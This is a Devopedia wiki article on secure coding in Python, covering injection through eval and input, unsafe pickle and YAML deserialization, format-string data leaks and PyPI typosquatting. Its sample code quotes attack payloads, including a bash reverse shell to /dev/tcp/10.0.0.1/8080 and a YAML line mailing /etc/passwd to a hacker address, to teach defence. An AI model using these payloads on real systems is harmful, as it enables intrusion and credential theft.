Secure Coding with Python

Article Info

Contributed by
2 authors

Last updated on
2020-08-11 03:30:08

Article Versions

5 2020-08-11 03:30:08
2200,1995 5,2200

By sangeetha-prabhu

Pysa details added.
4 2020-03-22 12:08:31
1995,1994 4,1995

By arvindpdmn

Title case change. Publishing.
3 2020-03-22 11:55:33
1994,1993 3,1994

By sangeetha-prabhu

Adding content to article. Images uploaded. Ready for review.
2 2020-03-20 16:44:58
1993,1104 2,1993

By sangeetha-prabhu

Added more tags. See Alsos. Identified some questions.
1 2019-01-03 16:31:53
1,1104

By arvindpdmn

First version

Chat Room

Submitting ...

You are editing an existing chat message.
2020-08-11 03:30:47
-

By devbot5S

[URL Check] The following URLs in this article are outdated. Please update.

Redirected URLs:
Discussion: https://pypi.python.org/pypi/pycrypto → https://pypi.org/project/pycrypto/
Discussion: https://www.inspec.io/docs/reference/resources/pip/ → https://docs.chef.io/inspec/resources/pip/
2020-08-11 03:30:08
-

By arvindpdmn

[Draft Approval Comment]
Useful update with Pysa details.

Writing secure code is essential for protecting sensitive data and maintaining correct behaviour of applications. This is more relevant today when most applications connect to the web, exchange data and even update themselves. While security considerations and best practices are typically language agnostic, in this article we focus on Python-specific issues.

OWASP's Python Security project has identified three angles: Security in Python (white-box analysis, functional analysis), Security of Python (black-box analysis), and Security with Python (develop security-hardened Python).

While some vulnerabilities are due to the way Python modules and functions behave, others are due to the manner in which third-party packages are distributed. Since Python is an open developer ecosystem, anyone can share their own packages that others can use in their projects. However, this opens up a security risk that developers need to be aware of.

Discussion

What are some guidelines for writing more secure Python code?
Python2's input() is problematic. Source: Branca 2014, slide 28.
It's essential to validate user input. If not, an attacker could execute arbitrary code. Python functions eval(), exec(), input(), popen(), subprocess() and os.system() are dangerous in this regard. These could be used to bypass authentication or inject code. For example, Python2's input() could be exploited. An input of passwd to the statement if passwd == input("Please enter your password"): would bypass authentication.
Databases are also vulnerable to inputs. Commonly called SQL injection, using inputs directly in database commands is dangerous. Instead, validate the inputs and query databases via an ORM. Among the well-known Python ORMs are Django ORM, SQLAlchemy and Peewee.
Python assert statement must be used only on invariants for debugging. Using them for authentication (such as assert user.is_admin, "user does not have access") is wrong. Often on production servers, __debug__ == False and assert statements won't work.
To create temporary files, avoid the deprecated tempfile.mktemp() function. In general, keep your Python distribution and the packages you use up to date. For example, earlier CPython implementations of Python had memory overflow errors that could be exploited for arbitrary code execution.
How should I manage Python dependencies for a more secure application?
Process flow of a typosquatting attack on PyPI. Source: Bertus 2018.
PyPI is the repository from where third-party Python packages can be downloaded and installed if required by your project. Direct dependencies may have further dependencies. Any of these could have malicious code.
It's easy to create a malicious package based on a well-known package since the original code is open source and easily copied. Often these packages behave normally since the malicious code only resides in setup.py that executes once during installation. This is enough to install software that can later steal data or monitor behaviour. Some attacks modify the original code, for example, to steal SSH credentials.
Developers can be tricked into installing the wrong package by a slight modification of the original package name. This is called typosquatting. There are plenty of examples: acqusition impersonates acquisition; bzip impersonates bz2file; crypt impersonates crypto; setup-tools impersonates setuptools; urlib3 impersonates urllib3; diango impersonates django.
PEP458 proposes signing a package. However, this only verifies its author's identity. Instead, a combination of dynamic analysis (within a sandbox) and static analysis can be used to catch malicious packages.
What security risks do Python strings pose if used improperly?
Python3 introduced str.format() as a more powerful and flexible way to format strings. This method is called on a format string and it accepts Python objects as arguments. The problem is that attributes of these arguments can be accessed from within the format string. If the application allows users control of the format string, they can be misused to leak sensitive data.
There are a few cases where such control may be common. Applications that are translated into multiple languages may use untrusted translators who may be given control of the format string. Some applications may permit users to configure behaviour that might be exposed as format strings.
An example exploit is the code "{person.__init__.__globals__[CONFIG][API_KEY]}".format(person), where sensitive global data from a CONFIG dictionary is being accessed via the argument.
We can overcome this by validating the format string. One approach is shown by Armin Ronacher who subclasses Formatter and Mapping, makes use of formatter_field_name_split and throws an AttributeError if unsafe formats are detected.
What's a secure way to do data deserialization in Python?
An example exploit of pickle. Source: Branca 2014, slide 33.
Deserialization recreates Python objects by reading its representation from disk or network interface. It's possible to deserialize malicious data and thereby execute arbitrary code in your system. This is because objects are not just values. They contain constructors and methods that are executable code.
For example, a web application could store user information in a cookie that's formed using cPickles or pickle module. The object's __reduce__ method could be modified to contain malicious code. This method would be called during deserialization. A better approach would be to use json.loads(). If cPickles is used, verify the payload integrity using cryptographic signatures. PyCrypto is a useful package for this.
Another serialization format is YAML. YAML files can represent Python objects. Like pickle, it's possible to modify them to bypass authentication or execute arbitrary code. For example, configuration files in Ansible are YAML files. The following code obtains passwords and emails the same to the hacker's address: !!python/object/apply:os.system ["cat /etc/passwd | mail hacker@domain.com"]. Essentially, it's unwise to deserialize from an untrusted source. A safer alternative is to use yaml.safe_load() rather than yaml.load().
What are some resources for Python developers to create more secure code?
Python core modules that can help developers build security features include hashlib, hmac and secrets. For passwords and security tokens, secrets must be preferred over random. Functions hmac.compare_digest() and secrets.compare_digest() are designed to mitigate timing attacks.
Bandit is a useful static linter that can alert developers to common security issues in code. Another static analyzer, open sourced by Facebook, is Pysa. To audit installed packages and their versions, use a tool such as Chef InSpec. PyUp tracks thousands of Python packages for vulnerabilities and makes pull requests to your codebase automatically when there are updates.
Python Security is an OWASP project aimed at creating a security-hardened version of Python. Their page on security concerns in modules and functions is worth reading. They've also curated a list of Python libraries for security applications.
Some Python Enhancement Proposals (PEPs) specific to security are worth reading for in-depth understanding. Among them are PEP458, PEP506, PEP551, and PEP578.

Milestones

Dec
2008

Python 3.0 is released. This release includes PEP 3101 -- Advanced String Formatting. Strings can now be formatted using the str.format() method. For more secure code, it's noted that applications shouldn't format strings from untrusted sources. The next best approach is to ensure that string formatting doesn't result in visible side effects, though this is not easy to achieve given the open nature of Python.

Jul
2011

Different approaches to modify a pickle stream. Source: Slaviero 2011, fig. 3.

Marco Slaviero publishes a detailed report on the many possible exploits and attack scenarios on the pickle module. He gives guidelines on how to write shellcode to create such exploits. He provides a library of exploits such as retrieve a list of globals and locals, make operating system calls, execute arbitrary Python code, alter local variables or create a DoS attacks.

Dec
2016

Python 3.6.0 is released. This release includes the secrets module that's documented in PEP 506. Python's existing random module is not suited for security purposes. Though documentation makes this clear, many implementations are seen to ignore this warning. To solve this problem, secrets module includes ready-to-use functions for managing passwords, tokens and other secrets.

Oct
2018

Malicious packages found on PyPI via static analysis. Source: Bertus 2018.

Bertus, a software security engineer, creates a static analysis tool to automatically detect if a package published on PyPI is malicious. From a scan of 123,000 packages, he identifies about a dozen such packages containing various exploits.

Nov
2019

Overview of role metadata on PyPI. Source: Kuppusamy et al. 2013, fig. 1.

Discussions start towards implementing PEP 458 -- Secure PyPI downloads with signed repository metadata. Although this PEP was started in 2013, funding becomes available only recently. The idea of this proposal is that authors need not sign the packages they upload to PyPI. PyPI will automatically sign these packages using keys managed by PyPI. This is called minimum security model. This PEP doesn't address the maximum security model in which authors can sign the packages.

Dec
2019

German software developer Lukas Martini finds two packages on PyPI that are doing typosquatting. These are python3-dateutil (impersonating dateutil) and jeIlyfish (impersonating jellyfish). The former doesn't have any malicious code but it imports the latter. Package jeIlyfish downloads a file, decodes that into Python code and executes it. This code attempts to read SSH and GPG keys from the computer and send them to a specific IP address.

Aug
2020

Pysa tracks data flows through the program. Source: Bleaney and Cepel 2020.

Facebook open sources Pysa, a static analysis code to detect and prevent security issues in Python code. It's shipped as part of Pyre, a static type checker tool. Pysa tracks data flows. Developers define sources where data originates and sinks where data shouldn't end up. It warns when data reaches a sink. It has techniques to mitigate false positives and false negatives.

Sample Code

# Source: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
# Accessed: 2020-03-21
 
# --------------------------------------------------
# Exploit of eval()
def addition(a, b):
  return eval("%s + %s" % (a, b))
 
# Such an input might be a JSON response to a network request
userinput = {
  "a": "__import__('os').system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')#",
  "b": "2"
}
result = addition(userinput['a'], userinput['b'])
print("The result is %d." % result)
 
 
# --------------------------------------------------
# Exploit of exec()
# Can be exploited in the same way as eval()
def addition(a, b):
  return exec("%s + %s" % (a, b))
 
 
# --------------------------------------------------
# Bypass authentication in Python2's input()
# Python3's input() will convert input to a string and is therefore safer
user_pass = get_user_pass("admin")
if user_pass == input("Please enter your password"):
  login()
else:
  print "Password is incorrect!"
 
# Bypass authentication if user enters 'user_pass'
# if user_pass == user_pass: // this will evaluate as true

# Source: https://medium.com/poka-techblog/rotten-pickles-a-quick-introduction-to-offensive-serialization-techniques-83fd4dd36edb
# Accessed: 2020-03-21
# Example using cPickle
 
# Definition of a user
class User(object):
    def __init__(self, name):
        self.name = name
 
# The user is serialized along the way using
# something like:
# userdata = base64.encode(cPickle.dumps(user))
# resp.set_cookie('userdata', userdata)
 
# Insecure Flask route
@app.route('/welcome/', methods=['GET'])
def index():
    userdata = request.cookies.get("userdata")
    user = cPickle.loads(base64.decode(userdata))
    return "Greetings, {}".format(user.name)
 
# __reduce__() is called during deserialization
class BadUser(object):
    def __reduce__(self):
        return (self.__class__, (subprocess.check_output(["uname", "-a"]), ))
    def __init__(self, name):
        self.name = name
baduser = BadUser("Max")
bad_cookie = base64.encode(cPickle.dumps(baduser))
 
 
# Source: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
# Accessed: 2020-03-21
# Example using PyYaml
 
class Person:
  def __init__(self, name):
    self.name = name
 
new_person = Person("Vickie")
print(yaml.dump(new_person))
 
# This will print:
# !!python/object:__main__.Person {name: Vickie}
# Someone can attack an application by changing 'Vickie' to 'Admin'
# and then loading it using yaml.load(YAML_FILE)
 
# Someone can execute arbitrary code by changing the line to the following example:
# !!python/object/apply:os.system ["bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"]

# Source: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
# Accessed: 2020-03-21
 
CONFIG = {
  "API_KEY": "771df488714111d39138eb60df756e6b" 
}
 
class Person(object):
  def __init__(self, name):
    self.name = name
 
def print_nametag(format_string, person):
  return format_string.format(person=person)
 
person = Person("Vickie")
 
# Okay call that will print: Hi, my name is Vickie. I am a Person.
greeting = print_nametag("Hi, my name is {person.name}. I am a {person.__class__.__name__}.", person)
print(greeting)
 
# Malicious call: the format may be read as a user input:
# print_nametag(input("Please format your nametag: "), person)
greeting = print_nametag("{person.__init__.__globals__[CONFIG][API_KEY]}", person)
print(greeting)

References

Article Stats

1555

Words

Authors

Edits

Chats

Likes

14K

Hits

Cite As

Devopedia. 2020. "Secure Coding with Python." Version 5, August 11. Accessed 2023-11-12. https://devopedia.org/secure-coding-with-python

Contributed by
2 authors

Last updated on
2020-08-11 03:30:08

languages security data serialization dependency management

Secure Coding with Python

Discussion

Milestones

Sample Code

References

Further Reading

Article Stats

Author-wise Stats for Article Edits

Cite As

See Also

Login